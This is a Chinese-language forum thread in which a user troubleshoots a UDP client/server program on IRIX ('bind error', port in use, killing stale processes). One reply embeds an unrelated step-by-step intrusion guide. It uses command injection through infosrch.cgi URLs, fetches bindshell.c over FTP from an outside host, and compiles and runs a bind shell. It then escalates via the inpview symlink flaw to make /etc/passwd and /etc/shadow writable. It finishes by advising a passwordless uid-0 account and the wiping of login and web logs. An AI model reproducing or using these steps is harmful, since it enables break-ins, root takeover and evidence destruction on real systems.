求救！！：关于UNIX系统UDP编程问题

berryfly

我刚才在命令行敲server.exe & client.exe 127.0.0.1 8888
系统出错信息
bind error .端口 is in use

不知道这是什么错误。
另：我开过两个窗口，一个运行server.exe 一个运行client.exe，没有反应。
我没有办法开两个终端，因为就一个机器是irix操作系统的，呜呜。
还有个问题，因为已经编译成exe文件，应该说程序没有问题吧？

再次麻烦了：）！！！！！

me09

nobody shell

      有个家伙跟我说过某个站点是IRIX，有个infosrch的cgi漏洞，OK，假定该站为www.targe.co.jp吧。

1、http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|ls%20-la这就是它的利用方法了。其中ls -la是我们要运行的命令，我不太习惯在web shell里面干活，还是要弄出一个shell有个$来得方便些，于是就用ftp。

2、http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=echo%20open%20www.xfocus.org>;/tmp/a
……
……
上面这些其实就是把这一段东西输进/tmp/a中：

open www.xfocus.org <---------别当真，这里没有这个东西
user quack quack <---------我的用户名密码
binary
cd /home/quack
lcd /tmp
prompt
get bindshell.c <---------这是一个绑定shell的东西，网上到处有
bye

http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|nohup%20ftp%20-ivn%20</tmp/a

这里呢，就是在运行ftp取回东西了这么拿文件的话在xferlog里不会有记录。

http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/usr/local/bin/gcc%20/tmp/bindshell.c%20-o%20/tmp/abc

编译

http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/tmp/abc

运行……

3、现在我们可以telnet上去了

bash# telnet *.*.*.* 12345
Trying *.*.*.*...
Connected to *.*.*.*.
Escape character is '^]'.
sh -i；
$ id；
uid=60001(nobody) gid=60001(nobody)
$

4、利用IRIX的inpview漏洞，该漏洞的描述如下：

某些版本IRIX下的inpview会在/var/tmp/目录下不安全地建立临时文件，这些临时文件名并不随机，用户可以建立一个符号链接到其他文件，利用inpview的setuid-to-root权限覆盖其他文件，同时对应文件权限被更改成0666。

漏洞利用程序就不贴了，大家自己看看，很简单的，总之编译完成之后。

$ ./a.out /etc/passwd;

copyright LAST STAGE OF DELIRIUM jan 2000 poland //lsd-pl.net/
/usr/lib/InPerson/inpview for irix 6.5 6.5.8 IP:all

looking for temporary file... found!
……
……

$ ./a.out /etc/shadow;
……
……

就把这两个破文件的权限都改成0666了，往下该干什么活不用我说了吧……
加个uid0的帐号，密码为空，修改系统，删除sulog\weblog\wtmp\utmp里的记录以及把/tmp下面的东西干掉，把passwd和shadow恢复回原样，再touch一下。走人，睡觉。

btw:一句题外话，现在IRIX的telnetd漏洞很猛呀，还好要有irix系统编译exploit，少了些小孩做坏事，还有，那天stardust说还有许多IRIX的lp默认密码为空，我看了一下，的确如此，印象中mixter写了一个小段子专门搜索网上lp空密码帐号的……

me09

原帖由 "berryfly" 发表：
我刚才在命令行敲server.exe & client.exe 127.0.0.1 8888
系统出错信息
bind error .端口 is in use

不知道这是什么错误。
另：我开过两个窗口，一个运行server.exe 一个运行client.exe，没有反应。
我没有..........

错误是说8888端口正在被使用
说名你上次运行的server.exe未退出

berryfly

这个东东是啥意思？
如果你不介意，可以给我你的电话，这样一问一答的，问题总也说不清楚，累死我了，呵呵。

berryfly

我查过的，8888没有被系统使用。
如果被使用了，应该是server.exe & client.exe 127.0.0.1 8888 使得两个程序同时使用8888？
你在试这个程序时是两个终端还是一个终端的两个窗口？
我如何退出以前使用的server.exe?

me09

1个2个都可以
#server.exe &
看报不报错
然后运行
#client.exe 127.0.0.1 8888
可以这样看看

me09

偶！
你这样运行看看
#./server.exe
#./client.exe 127.0.0.1 8888
如果还不行
cc  server.c  -o recv //服务器
cc  client.c  -o send // 客户端

然后：
#./recv &
#./send 127.0.0.1 8888
如果还不行就郁闷了

berryfly

又运行了server.exe & client.exe 127.0.0.1 8888
屏幕出现
[1]1523
然后没反应了。
如果两个窗口运行，不会出现错误信息，但也是没有反应。
我去试试
cc  server.c  -o recv //服务器
cc  client.c  -o send // 客户端

然后：
#./recv &
#./send 127.0.0.1 8888
如果还不行就郁闷了
稍等一下

me09

server运行一次后是不退出了
要ps -e 找到他的进程号然后kill 进程号
然后再运行...

berryfly

运行了#./recv &
#./send 127.0.0.1 8888
还是不行，呜呜，和两个窗口分别运行是一样的。
还是程序有问题？
我已经用你的方法把进程杀掉了，现在才发现每次出现的数字是进程号，例如，前面和你说的1523。呵呵。

有什么方法将端口的包抓下来，这样就知道是sever出错还是在client出错？